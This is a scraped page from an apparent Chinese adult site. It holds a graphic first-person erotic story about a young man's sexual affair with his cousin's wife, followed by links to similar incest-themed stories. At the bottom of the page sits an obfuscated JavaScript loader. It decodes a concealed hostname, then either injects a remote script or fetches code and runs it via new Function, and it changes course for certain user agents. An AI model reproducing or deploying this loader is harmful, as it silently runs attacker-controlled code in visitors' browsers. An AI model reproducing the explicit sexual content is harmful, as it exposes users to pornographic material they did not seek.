返回

我和我的嫂子完54d

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

时间要追溯到2000年了,那个时候的我19岁。首先要提一下我当时的生活状况。我读书较早,5岁半就开始了1年级。很小的时候就读高2了,由于初中毕业没有考进重点班,所在的普通班当时的学习风气很差。原本40人的班级,到我退学的时候已经剩下了13人。基本上人数和老师数量相等了。同学中基本都是转学和参军了,还有些根本就不读了。开始父母也要给我办转学的,我死活不干,吵着要去部队当兵。那个时候当兵还是要分工作的,加上父母的单位还可以,要是当兵退伍可以直接进父母的单位。当时高中毕业能够进大学的几率是5比1左右。父母权衡再3终于同意了我的要求。[顺便再提一句我读书是高95级的,如遇到同级的狼友一定支持一下。当兵很顺利,我身体很好,体检没有任何问题,加之家里亲戚当时在武装部政委,所以我基本没有费什么劲就去了部队。

到了部队全是男人的世界,成天吃饱了就是锻炼身体。加之年龄的关系,体内的荷尔蒙分泌之旺盛可想而知。当过兵的朋友都知道部队流行一句话,当兵3年母猪塞貂禅。呵呵,可想而知,部队里的男人是多么的渴望女人。当然什么母猪赛貂禅肯定比较夸张,但是真还听老兵讲过很多很离奇的事情。什么搞同性恋呀,什么和部队里小卖部的中年妇女呀,还有最多的就是把当地的村姑肚皮搞大的呀。还听到过一老兵讲,以前有一老兵真把连队的老母猪搞过一次……当然更多的当兵的都是选择周末去部队驻地外面的发廊,练歌房找小姐发泄。毕竟每个礼拜就那么一两天的时间,而且当兵的兜里可没有多少钱。而象我这个年纪的就不同了,由于当时读书年纪就小,那个时候的我还对女人没有多少兴趣,当别人在开始早恋的时候,我成天还沉迷在一起打架抽烟逃课的乐趣中,根本还是个童男子。到了部队也有老兵要带我出去一起玩的被我拒绝了。当时的想法很天真,觉得自己是个处,找个鸡婆来第一次太不划算了。所以除了打打手枪以外,还算规矩。不过对女人的渴望可想而知呀!

那个时候社会上已经开始有了网吧。我也趁每周外出的机会,开始聊起了QQ。经历过那个时代的人都知道,只要那几年在上网聊QQ的人,都经历过网恋。更何况我这个适龄青年,开始了我在网上的第一次恋爱。那个时候还没有视频,在网上认识以后就留了个传呼号码给我,我每天晚上就给她打传呼。那个时候我已经有了第一个手机,NOKEA3210,父母为了我在部队打电话方便给我买的。[当时的部队一个团就2部IC卡电话,每天排队打电话的可以排几十米的队。我比起我的战友们家庭条件还算可以。]她那个时候在成都一个郊县的交通局上班,也刚参加工作。我们就这样通过电话聊上了。[小狼是四川人绵阳人]。互相通过书信交换了照片。她可算是个大美女,165的个子,体重只有90多一点,但是胸部相当的饱满,后来知道是36C,而且很新潮。头发是那几年最流行的韩式,呵呵就是那种梯田。头发从刘海到两边是成阶梯状的。

在部队认识了她之后,当然想的最多的就是见面了。我当兵在东北,她在成都。3000多公里的距离呀。兄弟我那个时候的津贴全交了电话费还不够。[我当的是海军,每个月杂七杂八的还有300元左右]终于到了年底,该休假了。毕竟也3年没有见父母了,首先克制住自己没有直接去成都见女朋友,而是直接回了家。

一到家没有几天就该过年了。她老家和我一个地方的,她也要和父母一起回老家亲戚家过年。那个时候的我们,每次电话谈论最多的就是见面的场景了。一般美女还是有点傲慢的,她的要求就很过分,要我去火车站接她,而且是一定要穿军装,手里拿一大束玫瑰花。我当时觉得我做不了。首先她父母和她一起下火车,再就是穿军装又在手里拿一大束玫瑰花在春节期间的火车站,目标也太大了。后来在我的一再要求下,终于同意等她安顿下来后,我们在市中心的一家咖啡厅里见面。

终于等到了见面的那天。记得很清楚,约的是下午2点,上午就去花店把花定好了。中午随便拔了几口饭。就出门了,首先是去了理发店弄了弄头发,然后直接打车去了花店,拿了花马上给她打电话,她居然说她已经到了,但是不告诉我座位,叫我自己找她。我赶紧又打车去了见面的咖啡厅。进去一看,好几个位置上都有一位美女。虽然和她之前交换过照片,但是还是有点拿不准。我掏出电话就开始拨她的号码,奇怪了,没有一个拿出手机来的,也没有听见电话响。我有点感觉好象被放鸽子了,但还是不死心。挨着去问;小姐你在等人吗?终于问到第3个的时候她忍不住笑了。原来她故意把电话调到震动了。而且老远就认出了我,看见我打电话故意没有接。很有特点的头发被她用一顶毛线帽子藏了起来。接下来的谈话很顺利,马上就找到了电话中的感觉。一转眼一下午就过去了。

接下来的几天,我开始过着夜夜声歌的生活。那个时候还没有多少量贩歌城,去的地方基本上都是迪厅,我开始猛花钱。天天晚上除了我和她,我还叫一大帮朋友出来一起玩。在酒精和音乐的作用下,大家都疯狂的扭动着身体,基本上都是我们几个围成一圈,她和我在中间,看着她动人的曲线,我那帮哥们都对我投来羡慕的眼神。她每天晚上都要回亲戚家,白天都要和家人在一起。所以除了每天晚上送她回家的楼梯上可以温存一下,没有任何进一步的动作。那个时候的我,在她面前应该说还有点腼腆,一牵她的手就下面有反应了。没几天她就该回去了,我虽然很着急上火,但也找不出什么好方法把她上了。就这样年后她就回单位上班了,我们一直电话联系着。

我在成都有一堂哥,好多年没有见面了。他叫我去他那玩,我想着去成都可以找我女朋友就去了。我哥在成都开发廊好多年了,有车有房。每天早上都是他一早出门去店里,我和嫂子在家吃午饭,然后我嫂子带我出去玩。我嫂子也很漂亮,和我哥结婚刚2年,标准的四川女人。小巧玲珑。他们结婚的时候我在部队,我和她还是头一次见面。不过年龄也比我大不了几岁。很快就混的很亲热了。出门老是挽着我的手。她老是拉着我去和她逛街。说什么平时我哥都忙店里生意去了,一直没有什么时间陪她逛街,叫我帮我哥补偿她。我就这样被她拉着逛了几天。我倒心里很着急,想着怎么才能够和我女朋友见面,可是她却告诉我这几天过完年刚上班很忙,叫我也别去找她。她父母知道了不好。说过完这几天就来市里见我。

事情发生的很偶然,前面说了那么多,无非是叙述了很多当时的状况。下面这段文字应该才算和标题呼应。那段时间我和我嫂子混的很熟了,她开始给我讲一些她和我哥之间的事情。她告诉我,我哥很花心,他们这2年老吵架,因为我哥老是和店里的女客人有瓜葛。[我哥178,很帅,可以说是天生的小白脸],还说什么我哥不爱惜她的身体,结婚前就为他做过2次人流。其实这些我早有所耳闻,听父母讲过。家人都知道我哥很花心,当初和我嫂子好可能是看上我嫂子家有钱。不然可能还要花上好几年才会结婚的。每次我嫂子一讲到这些就哭,她告诉我她平时都是在看店,没有机会接触什么朋友,也没法向谁诉说心中的苦闷,心里一直很压抑,给我说这些她自己也不知道是为什么。我那个时候阅历也浅,除了能够简单的安慰她几句以外,更多的也就是当她的听众,陪她一起喝酒。她在我面前喝醉了好几次,家里就只有我和她,喝多了就是我把她扶上床去,嫂子胸部很鼓,在家就穿一件贴身的毛衣,喝多了小胸脯起伏很大,每当这个时候我的老二总是会有反应。但是她毕竟是我堂哥的女人,是我的嫂子,我也没有敢多想其他的。

时间就这样又过去了一个星期,我和我嫂子呆的时间长了,听的也多了,不免心中对她产生了些须怜。

一天晚上他们开的店里的一个伙计过生日,下班以后请我们一起出去吃饭。席间都是年轻人,酒是自然喝的特别多。因为他们下班都已经快晚上10点了,去的也不是那种什么大餐厅就是那种很便宜的小火锅。喝的又是啤酒。大家上厕所的频率都很高。那是家家庭式的小火锅,我们坐的2楼。去厕所还要过一个房间和阳台才是。老板为了省电连阳台上的灯都没有装,只有厕所里有灯,而且只有一个位置。我哥是属于3瓶啤酒就要倒的,平时一般不喝酒,那天因为是我在的缘故,还挨个敬了所用人一杯。没一个小时他就不行了,吵着要回家睡觉,可是他店里那帮人死活都不要他走,他只有趴在桌子上难受。我和我嫂子酒量都很不错,大家一起划拳喝酒。喝到12点了,基本上就我们这一桌了。这个时候我又尿涨了,去厕所。因为后面也没有其他人,上厕所想马上完了就出来也就没有插厕所门。当我尿到一半的时候,门被掀开了,我嫂子也闯了进来。我被吓了一大跳,很不好意思,赶紧把老2往裤裆里塞。脸上表情很尴尬。我嫂子却哈哈大笑起来。她说,吓到你了吧?吓坏了没有?手往我裤裆上摸。我当时被搞懵了,一脸的茫然。没等我反应过来,嘴巴已经贴到了我的嘴上。我当时只感觉她的舌头好软,很轻易的就把我的舌头俘虏了。跟着手伸到我的裤裆里,轻轻的抚摩着我的鸡吧。我忙一把推开她,说;嫂子,你喝多了吧?她说;你以为我喝多了,还早着呢;。然后我就出了厕所,快步走开了。她过了一会也回到了位置上,又喝了没一会,这帮人就散了。

我和嫂子扶着我哥,坐上了出租车,一路上我没有和她说话,只有我哥一个劲的说好难受。回到家,把我哥弄上床躺着。我坐在沙发上看电视,脑子里一直在想刚才发生的那一幕,我觉得应该是个意外吧,不过嫂子的唇确实好舒服。嫂子把我哥安顿好。也坐到了沙发上。她问我喝多了没有?我说没有。她说她还想喝酒,想去跳舞。没有等我说什么,她已经拿起包,准备换鞋了。我也没有考虑什么,就跟着她出去了。

打车来到热舞。这个时候的热舞气氛正浓,在强劲的音乐和DJ的煽动下,美女帅哥们在尽情的舞动着身体。我们也加入了他们的行列。期间两个人又喝了一打嘉士伯。这个时候我和美丽的嫂子已经抱在一起舞动了。我脑子一片空白,只觉得今天晚上一定有事发生。嫂子搂着我的脖子,把嘴巴送了上来,应该是酒精的作用吧,加上之前的那一次意外,我这次没有退缩,把嘴贴了上去。两只舌头纠缠到了一起,不停的搅动,吮吸。我的手放到了她的背后,然后贴着背,滑向她的屁股。嫂子的屁股本来就很好看,被紧身的牛仔裤包裹着,显得很翘。那个吻持续了有3分钟吧,嫂子拉着我的手出了热舞。上了出租,一起坐到后排,手再也没有松开过。身体趴在我的腿上。我的胆子也大了起来,另外一只手伸到了她的乳房上,隔着胸罩抚摩起来。我正享受着的时候,车已经到她家小区门口了。

下车,进到了电梯口。我刚准备按电梯。嫂子拉着我的手,往楼梯间里走。走到3楼拐角的时候。我们又抱在了一起。这次她的手从我的衬衣下面伸了进来,我的唇疯狂的回应着她的吻,手也没有闲着,顺着毛衣下摆,伸了进去,直接从下面把她的胸罩掀了起来。手抓住她的奶子。这是我摸过的最好的一对奶子,好软,我的手正好把它把握。乳头已经挺了起来,我开始埋头吻她的脖子,然后把她的衣服掀了起来,开始吸她的奶头,嫂子发出了呻吟声,嘴里吸她的奶头。手又开始往她的牛仔裤里伸,但是好紧,只把手指头伸了进去,刚好摸着她的屁股担。这时候我终身难忘的事情发生了,嫂子突然蹲了下去,把我的拉链拉开了,把我早就撑的难受的老二拿了出来,然后一口含了进去。天呀,我惊呆了,以前我多少次看A片时幻想的一幕就这样发生了,而且含住我鸡吧的人还是我的嫂子。好刺激,好爽。已经找不出什么词来形容当时的感觉了。嫂子的动作相当的熟练,没有给我弄疼一叮点。一深一浅的让我的鸡吧在她嘴里滑动,我很快就受不了了,两个手抓住她的头加快了频率。再几下之后,我射了。射到了她的嘴巴里。嫂子在我的跨下挣扎,显然是把她呛到了,在我射完最后一下的时候我松开手,她马上就吐了,接着就干呕了好几下,眼泪都出来了。我为刚才我的卤莽而感到不好意思,用手去扶她。她好象看出来了,嘴里忙说,没事。没事。

接着,我们上楼,她先去洗的澡,然后回她房间了。然后我也去洗了,刚回客房躺下,就听见门开了。嫂子穿着一件宽大的白体血走了进来。我们没有说话,又抱到了一起,这个时候我才发现,她是真空的,体血下面一丝不挂。这次她没有再给我舔鸡吧,而且把我压到了她的身下,蹲在了我的跨部,用一只手拿住我的龟头,在她的阴唇上来回磨搽。我看见了她的阴唇,应该说是第一次真实的看见一个女人的下体。毛很短,应该是修剪过的,阴唇的颜色比较浅,大阴唇很肥厚,应该是已经充血了。我的龟头已经明显感觉出了湿润,阴唇在台灯的照射下也已经亮晶晶的了。她用手把我的鸡吧对准坐了下来。我的小弟弟就这样头一次享受到了女人全方位包裹的感觉,好舒服,好温暖。嫂子开始疯狂的纽动的腰肢,两个手捉住我的手往她的乳房上牵引。可能也就3分钟吧,我射了,我的万千子孙头一次射进了一个女人的阴道。我能够感觉出嫂子并没有满足,但是她还是起来,有纸给我搽干净,很小心的搽的,没有给我弄疼。然后收起那些纸,吻了下我的额头。出去了。

第2天,我就回家了,嫂子送的我,哥仍然在店里忙,但是我们没有再说一句话,就上车之前说了句,拜拜。回到家,心里好长一段时间都有一种负罪感,再后来,在我要返回部队之前,我去了成都见我的女朋友,但是没有再去我哥他们家。再后来我回到了部队,过了一年他们离婚了,我哥现在有了新的家庭,听说我嫂子去了南方……再到后来我退伍了,换了不少女朋友。现在已经儿子已经一岁了。

评分
相关推荐
3.0分

3.0分 我和嫂子完e0d

3.0分

3.0分 我和我的美丽嫂嫂完3ae

3.0分

3.0分 我和嫂嫂完44b

3.0分

3.0分 表嫂和我完49b

3.0分

3.0分 【我和小秋嫂子偷情】【完】28a

3.0分

3.0分 我和嫂嫂【完】(作者:不详)33b

3.0分

3.0分 我和嫂子5c1

3.0分

3.0分 【多情嫂子和我上了床】【完】3f7

3.0分

3.0分 嫂嫂给我擦背,开始了我和嫂子的暧昧4d0

3.0分

3.0分 我和嫂子的乱伦3d1

3.0分

3.0分 我和嫂子的妈妈583

3.0分

3.0分 嫂子勾引我完6c6

3.0分

3.0分 我和我嫂子作者不祥591

3.0分

3.0分 我和化妆师嫂子fe7

3.0分

3.0分 嫂嫂和我上床c08

3.0分

3.0分 【我是怎么草到我嫂子的】 【作者:dannyy】【完】cbc


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};